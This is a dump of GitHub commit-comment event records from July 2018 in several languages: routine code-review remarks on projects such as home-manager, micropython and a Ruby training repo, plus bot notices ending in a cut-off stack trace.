{"id":"7993090731","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"rycee/home-manager"},"payload":{"comment":{"id":29774364,"position":116,"line":116,"path":"modules/misc/nixpkgs.nix","commit_id":"7417d8e86e9b1bfa47482f29604315f5ec2696bf","created_at":"2018-07-20T05:58:47Z","updated_at":"2018-07-20T05:58:47Z","author_association":"CONTRIBUTOR","body":"This causes updating to fail on darwin with an assertion saying that we're not on a Linux system. I thought it should use the current system, but that doesn't appear to be happening automatically."}},"created_at":"2018-07-20T05:58:47Z"}
{"id":"7993097104","type":"CommitCommentEvent","actor":{"login":"kishtb"},"repo":{"name":"kishtb/Myrepo"},"payload":{"comment":{"id":29774387,"position":null,"line":null,"path":null,"commit_id":"3f23cf1778c74c308e063547be4b6c322a979139","created_at":"2018-07-20T06:01:04Z","updated_at":"2018-07-20T06:01:04Z","author_association":"OWNER","body":"    class Simple{\r\n    public static void main(String args[]){\r\n    System.out.println(\"Hello Java\");\r\n    }\r\n    }"}},"created_at":"2018-07-20T06:01:04Z"}
{"id":"7993100394","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774393,"position":33,"line":34,"path":"tn_01/right_triangle.rb","commit_id":"df5e4eca22c71b2cd2d1144d4b9b2b486845e68c","created_at":"2018-07-20T06:02:13Z","updated_at":"2018-07-20T06:02:13Z","author_association":"NONE","body":"эту строчку лучше добавить \"правильным образом\" в предыдущий блок, нежели она здесь висит сама по себе\r\n"}},"created_at":"2018-07-20T06:02:13Z"}
{"id":"7993100782","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"rycee/home-manager"},"payload":{"comment":{"id":29774394,"position":116,"line":116,"path":"modules/misc/nixpkgs.nix","commit_id":"7417d8e86e9b1bfa47482f29604315f5ec2696bf","created_at":"2018-07-20T06:02:24Z","updated_at":"2018-07-20T06:02:24Z","author_association":"CONTRIBUTOR","body":"Commenting out this line causes things to build fine."}},"created_at":"2018-07-20T06:02:24Z"}
{"id":"7993101682","type":"CommitCommentEvent","actor":{"login":"basil-conto"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29774396,"position":null,"line":null,"path":null,"commit_id":"d1d567ac6fb70b88342d9db4db2b2d4f89c10e29","created_at":"2018-07-20T06:02:42Z","updated_at":"2018-07-20T06:02:42Z","author_association":"CONTRIBUTOR","body":"> But the variable is clearly obsoleted at the definition site\r\n\r\nYup, hence `counsel--push-xref-marker`.\r\n\r\n> So at one point I was getting the warning that `find-tag-marker-ring` is obsolete.\r\n\r\nPerhaps you're thinking of before commit d89abf274a68d50f8eeb671f4767c561dd7d274d? I don't think #1630 introduced any new byte-compiler warnings/errors."}},"created_at":"2018-07-20T06:02:42Z"}
{"id":"7993102282","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29774398,"position":null,"line":null,"path":null,"commit_id":"546c6721c3f902d18bea5565ed4708979ea61522","created_at":"2018-07-20T06:02:58Z","updated_at":"2018-07-20T06:02:58Z","author_association":"MEMBER","body":"50 sounds good!"}},"created_at":"2018-07-20T06:02:58Z"}
{"id":"7993103388","type":"CommitCommentEvent","actor":{"login":"umberto-cappellini"},"repo":{"name":"umberto-cappellini/ihe-normative"},"payload":{"comment":{"id":29774403,"position":null,"line":null,"path":null,"commit_id":"6b2f8aaeb3046ec3cc82e10689bbb2a417f3f065","created_at":"2018-07-20T06:03:24Z","updated_at":"2018-07-20T06:03:24Z","author_association":"OWNER","body":"TOC generated with doctoc: https://www.npmjs.com/package/doctoc"}},"created_at":"2018-07-20T06:03:24Z"}
{"id":"7993103556","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774405,"position":33,"line":34,"path":"tn_01/right_triangle.rb","commit_id":"df5e4eca22c71b2cd2d1144d4b9b2b486845e68c","created_at":"2018-07-20T06:03:28Z","updated_at":"2018-07-20T06:03:28Z","author_association":"NONE","body":"нет смысла писать `&& right_triangle == true`, достаточно и правильно будет написать так: `&& right_triangle`"}},"created_at":"2018-07-20T06:03:28Z"}
{"id":"7993106522","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774411,"position":33,"line":34,"path":"tn_01/right_triangle.rb","commit_id":"df5e4eca22c71b2cd2d1144d4b9b2b486845e68c","created_at":"2018-07-20T06:04:34Z","updated_at":"2018-07-20T06:04:34Z","author_association":"NONE","body":"если условие на прямоугольность выполняется, то первая проверка в текущем виде бессмыссленна... у тебя могут быть равны только короткие стороны, зачем их сравнивать с гипотенузой?"}},"created_at":"2018-07-20T06:04:34Z"}
{"id":"7993108067","type":"CommitCommentEvent","actor":{"login":"clemsciences"},"repo":{"name":"cltk/cltk"},"payload":{"comment":{"id":29774413,"position":null,"line":null,"path":null,"commit_id":"923ea6b7a686bd73950f2b27ccdd37ce91125317","created_at":"2018-07-20T06:05:08Z","updated_at":"2018-07-20T06:05:08Z","author_association":"MEMBER","body":"I appreciate this example!"}},"created_at":"2018-07-20T06:05:08Z"}
{"id":"7993109504","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29774414,"position":19,"line":19,"path":"Homework7/MainL7Ex3.java","commit_id":"ff99b4c5dc9cc11f7fd8d20cbfc103454e723531","created_at":"2018-07-20T06:05:37Z","updated_at":"2018-07-20T06:05:37Z","author_association":"OWNER","body":"public static void printStudents(List Students, int course) {\r\n....\r\n}\r\n\r\nStudent.printStudent(Students, 2);"}},"created_at":"2018-07-20T06:05:37Z"}
{"id":"7993111349","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774418,"position":35,"line":36,"path":"tn_01/right_triangle.rb","commit_id":"df5e4eca22c71b2cd2d1144d4b9b2b486845e68c","created_at":"2018-07-20T06:06:16Z","updated_at":"2018-07-20T06:06:16Z","author_association":"NONE","body":"это тоже лучше в общий блок условий подключить\r\nу тебя же если он прямоугольный, то эту проверку даже и делать не нужно, т.е. правильно будет не производить все проерки подряд независимо, а усложнить дерево основного блока и выбирать только одну ветвь работы программы каждый раз"}},"created_at":"2018-07-20T06:06:16Z"}
{"id":"7993116927","type":"CommitCommentEvent","actor":{"login":"boundir"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29774425,"position":null,"line":null,"path":null,"commit_id":"27dfafea700375669fd9e3e22af1e96bdd0b1b1b","created_at":"2018-07-20T06:08:26Z","updated_at":"2018-07-20T06:08:26Z","author_association":"CONTRIBUTOR","body":"Thank you for pointing out. Will be modified once the PR checks are done."}},"created_at":"2018-07-20T06:08:26Z"}
{"id":"7993134007","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"MostafaAyesh/OctoPrintPlugin"},"payload":{"comment":{"id":29774454,"position":5,"line":null,"path":"OctoPrintOutputDevice.py","commit_id":"f284dbf48386dc1906564d711bba44a5bbe0bcde","created_at":"2018-07-20T06:14:20Z","updated_at":"2018-07-20T06:14:20Z","author_association":"NONE","body":"Better to return an empty string instead of nothing."}},"created_at":"2018-07-20T06:14:20Z"}
{"id":"7993141958","type":"CommitCommentEvent","actor":{"login":"jdkanani"},"repo":{"name":"vaibhavchellani/contracts"},"payload":{"comment":{"id":29774466,"position":34,"line":34,"path":"contracts/proofs/BalanceValidator.sol","commit_id":"def684843449738e84972a546a379bcff7e12683","created_at":"2018-07-20T06:17:03Z","updated_at":"2018-07-20T06:17:03Z","author_association":"NONE","body":"Add a line at end of the file. Linux will fail to count line otherwise. Nice practice to follow."}},"created_at":"2018-07-20T06:17:03Z"}
{"id":"7993143810","type":"CommitCommentEvent","actor":{"login":"jdkanani"},"repo":{"name":"vaibhavchellani/contracts"},"payload":{"comment":{"id":29774469,"position":29,"line":29,"path":"contracts/proofs/BalanceValidator.sol","commit_id":"def684843449738e84972a546a379bcff7e12683","created_at":"2018-07-20T06:17:39Z","updated_at":"2018-07-20T06:17:39Z","author_association":"NONE","body":"Use `SafeMath` for `+` operations."}},"created_at":"2018-07-20T06:17:39Z"}
{"id":"7993146197","type":"CommitCommentEvent","actor":{"login":"jdkanani"},"repo":{"name":"vaibhavchellani/contracts"},"payload":{"comment":{"id":29774474,"position":15,"line":15,"path":"contracts/proofs/BalanceValidator.sol","commit_id":"def684843449738e84972a546a379bcff7e12683","created_at":"2018-07-20T06:18:22Z","updated_at":"2018-07-20T06:18:22Z","author_association":"NONE","body":"Have to check if tx1 and tx2 are part of plasma chain and included in header block."}},"created_at":"2018-07-20T06:18:22Z"}
{"id":"7993148790","type":"CommitCommentEvent","actor":{"login":"nicodh"},"repo":{"name":"AOEpeople/crawler"},"payload":{"comment":{"id":29774487,"position":1,"line":256,"path":"Classes/Controller/CrawlerController.php","commit_id":"f8c34315cd80e58ad09eb4dd49c84123a4c62068","created_at":"2018-07-20T06:19:10Z","updated_at":"2018-07-20T06:19:10Z","author_association":"NONE","body":"Sorry I had a formatting issue which makes it hard to see. \r\nIn line 627 we had \r\n`else if (!isset($res[str_replace('.', '', $key)])) \r\n`\r\nand in line 628-629 \r\n`key = str_replace('.', '', $key);\r\nif (!isset($res[$key])) {`\r\nwhich is almost the same...\r\n"}},"created_at":"2018-07-20T06:19:10Z"}
{"id":"7993150734","type":"CommitCommentEvent","actor":{"login":"kingchin1218"},"repo":{"name":"ant-tech-alliance/ray"},"payload":{"comment":{"id":29774493,"position":61,"line":92,"path":"java/runtime-native/src/main/java/org/ray/spi/impl/RayletStateStoreProxyImpl.java","commit_id":"10650dc0e0e88d16fcb4fe9c40e80a3e8018545f","created_at":"2018-07-20T06:19:51Z","updated_at":"2018-07-20T06:19:51Z","author_association":"COLLABORATOR","body":"rename it!"}},"created_at":"2018-07-20T06:19:51Z"}
{"id":"7993152387","type":"CommitCommentEvent","actor":{"login":"nandubatchu"},"repo":{"name":"AuroraDAO/idex-api-docs"},"payload":{"comment":{"id":29774498,"position":5,"line":567,"path":"README.md","commit_id":"1601a247ae54b34ae80b65477aa741dc474a22cf","created_at":"2018-07-20T06:20:25Z","updated_at":"2018-07-20T06:20:25Z","author_association":"NONE","body":"@fubar I am specifically asking about these changes. (about to be applied from yesterday)."}},"created_at":"2018-07-20T06:20:25Z"}
{"id":"7993154560","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774502,"position":22,"line":8,"path":"scripts/affordable.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T06:21:12Z","updated_at":"2018-07-20T06:21:12Z","author_association":"NONE","body":"에러 메시지는 어디 한곳에다 따로 정리해두는 편이 낫지\r\n함수간의 통신에서 문자열을 사용하는건 아주 좋지 않은 방법이오\r\n이 함수를 사용하는 모든 곳에서 true/false같이 명백한 타입 대신 어떤 스트링을 뱉는지를 다 파악하고 있어야 하니까"}},"created_at":"2018-07-20T06:21:12Z"}
{"id":"7993161966","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774513,"position":33,"line":18,"path":"scripts/affordable.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T06:23:50Z","updated_at":"2018-07-20T06:23:50Z","author_association":"NONE","body":"함수명으로는 you의 것이라는것을 알아채기가 어렵기 때문..\r\n이 스크립트를 You에 변수로 주는게 나을 수도 있다고 생각하긴 함\r\n\r\n사실 관리를 잘할 자신이 있으면 상관 없는 문제긴 하오\r\n이건 개발 환경이 겜메니까 발생하는 문제라고 생각하는데\r\n다른 언어였으면 이런 짓거리 안해도 되니까.."}},"created_at":"2018-07-20T06:23:50Z"}
{"id":"7993166479","type":"CommitCommentEvent","actor":{"login":"whalemer"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29774519,"position":170,"line":242,"path":"tournaments/index.js","commit_id":"bc0781d72be66fc6946eb6d82989cc272487e67c","created_at":"2018-07-20T06:25:18Z","updated_at":"2018-07-20T06:25:18Z","author_association":"CONTRIBUTOR","body":"............................................................"}},"created_at":"2018-07-20T06:25:18Z"}
{"id":"7993166720","type":"CommitCommentEvent","actor":{"login":"dbevans"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29774520,"position":null,"line":null,"path":null,"commit_id":"18bc42c8c8dc99b59caf2a12c336794d8e539234","created_at":"2018-07-20T06:25:24Z","updated_at":"2018-07-20T06:25:24Z","author_association":"CONTRIBUTOR","body":"Actually these are dependencies of py37-pytest so only an issue when testing.  "}},"created_at":"2018-07-20T06:25:24Z"}
{"id":"7993168544","type":"CommitCommentEvent","actor":{"login":"BarnabasExplorer"},"repo":{"name":"BarnabasExplorer/smartcity-201807-fv"},"payload":{"comment":{"id":29774525,"position":null,"line":null,"path":null,"commit_id":"93f34e3a8b6a9a05368e6069bff0c1cb45429cd2","created_at":"2018-07-20T06:25:59Z","updated_at":"2018-07-20T06:25:59Z","author_association":"OWNER","body":"castle onshape files here: https://cad.onshape.com/documents/0d3d07f390f4fa2c05416ee5/w/333ad2967923025e4a36488c/e/116dca22d5aefd84d10d1047"}},"created_at":"2018-07-20T06:25:59Z"}
{"id":"7993169004","type":"CommitCommentEvent","actor":{"login":"rhuss"},"repo":{"name":"fabric8io/fabric8-maven-plugin"},"payload":{"comment":{"id":29774526,"position":null,"line":null,"path":null,"commit_id":"31c032e9f25fc662f08c2488b4e65e252c6d8eea","created_at":"2018-07-20T06:26:08Z","updated_at":"2018-07-20T06:26:08Z","author_association":"CONTRIBUTOR","body":"Good idea. Not sure in which places these goals are still used, but happy to merge an PR to clarify this.\r\n\r\nBTW, I wonder whether we should already switch the major version (or at least the minor version to 3.6) as this change might be to drastic for a 3.5 version ?"}},"created_at":"2018-07-20T06:26:08Z"}
{"id":"7993174506","type":"CommitCommentEvent","actor":{"login":"PREMjITHT"},"repo":{"name":"embeddedarm/linux-3.10.17-imx6"},"payload":{"comment":{"id":29774544,"position":4,"line":3,"path":"drivers/net/wireless/atmel/wilc3000/Kconfig","commit_id":"e43e3567cc1f0cf373abc40c60dd144bbc92df2d","created_at":"2018-07-20T06:27:48Z","updated_at":"2018-07-20T06:27:48Z","author_association":"NONE","body":"why this change is needed?"}},"created_at":"2018-07-20T06:27:48Z"}
{"id":"7993175389","type":"CommitCommentEvent","actor":{"login":"iaincalderfh"},"repo":{"name":"1and1internet/ubuntu-16-apache-php-7.1"},"payload":{"comment":{"id":29774546,"position":null,"line":null,"path":null,"commit_id":"c0cbba4f521bf9d9f569a1147593aae4c0df1238","created_at":"2018-07-20T06:28:04Z","updated_at":"2018-07-20T06:28:04Z","author_association":"NONE","body":"I would use \\s+ so you need at least one whitespace, otherwise could theoretically match something like MaxConnectionsPerChildPerHour etc."}},"created_at":"2018-07-20T06:28:04Z"}
{"id":"7993177859","type":"CommitCommentEvent","actor":{"login":"BarnabasExplorer"},"repo":{"name":"BarnabasExplorer/smartcity-201807-fv"},"payload":{"comment":{"id":29774549,"position":null,"line":null,"path":null,"commit_id":"93f34e3a8b6a9a05368e6069bff0c1cb45429cd2","created_at":"2018-07-20T06:28:54Z","updated_at":"2018-07-20T06:28:54Z","author_association":"OWNER","body":"baxter's car files here: https://cad.onshape.com/documents/184b09092ab8330634ec70a7/w/8a244376fed60ba9bdb8667e/e/0fab7d76e333a1e570a4ddd3"}},"created_at":"2018-07-20T06:28:54Z"}
{"id":"7993178739","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774551,"position":44,"line":36,"path":"scripts/build_dungeonDeck.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T06:29:11Z","updated_at":"2018-07-20T06:29:11Z","author_association":"NONE","body":"저게 내가 파이썬으로 짠 코드던가??\r\n원인은 모르겠소만 내가 짠거랑 뭔가 다르게 짠게 아닐까 싶은데 그럼"}},"created_at":"2018-07-20T06:29:11Z"}
{"id":"7993181496","type":"CommitCommentEvent","actor":{"login":"iamjliu2"},"repo":{"name":"iamjliu2/hello-world"},"payload":{"comment":{"id":29774558,"position":2,"line":2,"path":"README.md","commit_id":"504ce9b524298344e8f59813370b752d517b8fa2","created_at":"2018-07-20T06:30:07Z","updated_at":"2018-07-20T06:30:07Z","author_association":"OWNER","body":"how to use Html5 to get map info"}},"created_at":"2018-07-20T06:30:07Z"}
{"id":"7993182031","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774559,"position":173,"line":109,"path":"scripts/build_dungeonDeck.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T06:30:16Z","updated_at":"2018-07-20T06:30:16Z","author_association":"NONE","body":"이거 확실히 안 짚고 넘어가면 추후에 고통스러울 수 있음"}},"created_at":"2018-07-20T06:30:16Z"}
{"id":"7993183927","type":"CommitCommentEvent","actor":{"login":"aubincleme"},"repo":{"name":"xwiki-contrib/macro-sequence"},"payload":{"comment":{"id":29774564,"position":4,"line":44,"path":"pom.xml","commit_id":"4702b32a8e5a8a85f0bd2220bd5cb2201bf60bc2","created_at":"2018-07-20T06:30:54Z","updated_at":"2018-07-20T06:30:54Z","author_association":"MEMBER","body":"Looks like we have some leftovers from the switch here : https://jira.xwiki.org/projects/BLOCKLY?selectedItem=com.atlassian.jira.jira-projects-plugin:release-page&status=released-unreleased\r\nIt could be interesting to update the sequence macro releases and clean the release page of the blockly app"}},"created_at":"2018-07-20T06:30:54Z"}
{"id":"7993185300","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/desdeo-vis-feedstock"},"payload":{"comment":{"id":29774565,"position":null,"line":null,"path":null,"commit_id":"2666768b5b34caea05f7027a114828b6365e64a5","created_at":"2018-07-20T06:31:20Z","updated_at":"2018-07-20T06:31:20Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @frankier was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T06:31:20Z"}
{"id":"7993190123","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":29774572,"position":13,"line":69,"path":"ports/unix/moduselect.c","commit_id":"ef554ef9a2708a8f344f22e586f52fb1343ed524","created_at":"2018-07-20T06:32:55Z","updated_at":"2018-07-20T06:32:55Z","author_association":"MEMBER","body":"But this specifically contained a fast path for the commonly used object types (well, the only object types which should be used if one cares about performance)! \r\n"}},"created_at":"2018-07-20T06:32:55Z"}
{"id":"7993191471","type":"CommitCommentEvent","actor":{"login":"gneginskiy"},"repo":{"name":"nmice/Task"},"payload":{"comment":{"id":29774574,"position":15,"line":16,"path":"src/test/java/week06/TaskG02_04_ArrayList/ArrayListOwnTest.java","commit_id":"f226fd6e2ef5dcc475af69d6b2c4271067129f6c","created_at":"2018-07-20T06:33:21Z","updated_at":"2018-07-20T06:33:21Z","author_association":"COLLABORATOR","body":"What do you test here? Where is assert?"}},"created_at":"2018-07-20T06:33:21Z"}
{"id":"7993194638","type":"CommitCommentEvent","actor":{"login":"farhanbhoraniya-crest"},"repo":{"name":"farhanbhoraniya-crest/test-proj-4"},"payload":{"comment":{"id":29774581,"position":null,"line":null,"path":null,"commit_id":"fae5a58044457702bf64f841a3a9f666a2ccace4","created_at":"2018-07-20T06:34:20Z","updated_at":"2018-07-20T06:34:20Z","author_association":"OWNER","body":"comment"}},"created_at":"2018-07-20T06:34:20Z"}
{"id":"7993198426","type":"CommitCommentEvent","actor":{"login":"fdlk"},"repo":{"name":"molgenis/molgenis-client-js-api"},"payload":{"comment":{"id":29774590,"position":2,"line":1,"path":"src/molgenis-api-client.js","commit_id":"a7decfd61b30f4325b1e5218b3c3b2223d4bfbeb","created_at":"2018-07-20T06:35:36Z","updated_at":"2018-07-20T06:35:36Z","author_association":"MEMBER","body":"Nice catch!"}},"created_at":"2018-07-20T06:35:36Z"}
{"id":"7993201292","type":"CommitCommentEvent","actor":{"login":"fdlk"},"repo":{"name":"molgenis/molgenis-client-js-api"},"payload":{"comment":{"id":29774596,"position":23,"line":36,"path":"test/molgenis-api-client.spec.js","commit_id":"a7decfd61b30f4325b1e5218b3c3b2223d4bfbeb","created_at":"2018-07-20T06:36:31Z","updated_at":"2018-07-20T06:36:31Z","author_association":"MEMBER","body":"Typo?"}},"created_at":"2018-07-20T06:36:31Z"}
{"id":"7993205287","type":"CommitCommentEvent","actor":{"login":"abhiy7"},"repo":{"name":"abhiy7/abhiy7.github.io"},"payload":{"comment":{"id":29774618,"position":null,"line":null,"path":null,"commit_id":"4aa1e85dd69e3d4efdc31cc1994a69581e6694e0","created_at":"2018-07-20T06:37:42Z","updated_at":"2018-07-20T06:37:42Z","author_association":"OWNER","body":"![abc](https://user-images.githubusercontent.com/38046790/42987041-7b4f48a2-8c15-11e8-9778-9b3efa5c1f93.jpg)\r\n"}},"created_at":"2018-07-20T06:37:42Z"}
{"id":"7993206116","type":"CommitCommentEvent","actor":{"login":"abhiy7"},"repo":{"name":"abhiy7/abhiy7.github.io"},"payload":{"comment":{"id":29774621,"position":null,"line":null,"path":null,"commit_id":"4aa1e85dd69e3d4efdc31cc1994a69581e6694e0","created_at":"2018-07-20T06:37:59Z","updated_at":"2018-07-20T06:37:59Z","author_association":"OWNER","body":"mypicf"}},"created_at":"2018-07-20T06:37:59Z"}
{"id":"7993211774","type":"CommitCommentEvent","actor":{"login":"fdlk"},"repo":{"name":"molgenis/molgenis-client-js-api"},"payload":{"comment":{"id":29774642,"position":64,"line":86,"path":"test/molgenis-api-client.spec.js","commit_id":"a7decfd61b30f4325b1e5218b3c3b2223d4bfbeb","created_at":"2018-07-20T06:39:45Z","updated_at":"2018-07-20T06:39:45Z","author_association":"MEMBER","body":"Why the newline?"}},"created_at":"2018-07-20T06:39:45Z"}
{"id":"7993213940","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29774648,"position":null,"line":null,"path":null,"commit_id":"bf6d16a8ce1d379aad97d3806b0448a4b929667a","created_at":"2018-07-20T06:40:25Z","updated_at":"2018-07-20T06:40:25Z","author_association":"COLLABORATOR","body":"Puzzle `142-c68e564e` disappeared from [`stroyprombeton/tests/tests_selenium.py`](https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium.py), that's why I closed #209. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-20T06:40:25Z"}
{"id":"7993214023","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29774649,"position":null,"line":null,"path":null,"commit_id":"bf6d16a8ce1d379aad97d3806b0448a4b929667a","created_at":"2018-07-20T06:40:27Z","updated_at":"2018-07-20T06:40:27Z","author_association":"COLLABORATOR","body":"Puzzle `142-32237ef1` disappeared from [`stroyprombeton/tests/tests_selenium.py`](https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium.py), that's why I closed #210. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-20T06:40:27Z"}
{"id":"7993214113","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29774650,"position":null,"line":null,"path":null,"commit_id":"bf6d16a8ce1d379aad97d3806b0448a4b929667a","created_at":"2018-07-20T06:40:28Z","updated_at":"2018-07-20T06:40:28Z","author_association":"COLLABORATOR","body":"Puzzle `380-0244f860` disappeared from [`stroyprombeton/tests/tests_selenium.py`](https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium.py), that's why I closed #234. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-20T06:40:28Z"}
{"id":"7993214226","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29774651,"position":null,"line":null,"path":null,"commit_id":"bf6d16a8ce1d379aad97d3806b0448a4b929667a","created_at":"2018-07-20T06:40:31Z","updated_at":"2018-07-20T06:40:31Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> GET https://api.github.com/repos/fidals/stroyprombeton/issues/380: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nOctokit::NotFound\nGET https://api.github.com/repos/fidals/stroyprombeton/issues/380: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/response/raise_error.rb:16:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:9:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:61:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:8:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:73:in `perform_with_redirection'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:61:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/rack_builder.rb:143:in `build_response'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:387:in `run_request'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:138:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/sawyer-0.8.1/lib/sawyer/agent.rb:94:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:156:in `request'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:19:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/client/issues.rb:114:in `issue'\n/app/objects/github_tickets.rb:39:in `notify'\n/app/objects/logged_tickets.rb:36:in `notify'\n/app/objects/github_tagged_tickets.rb:36:in `notify'\n/app/objects/commit_tickets.rb:34:in `notify'\n/app/objects/emailed_tickets.rb:31:in `notify'\n/app/objects/sentry_tickets.rb:36:in `notify'\n/app/objects/diff.rb:38:in `block in notify'\n/app/objects/diff.rb:33:in `each'\n/app/objects/diff.rb:33:in `notify'\n/app/objects/job.rb:40:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in 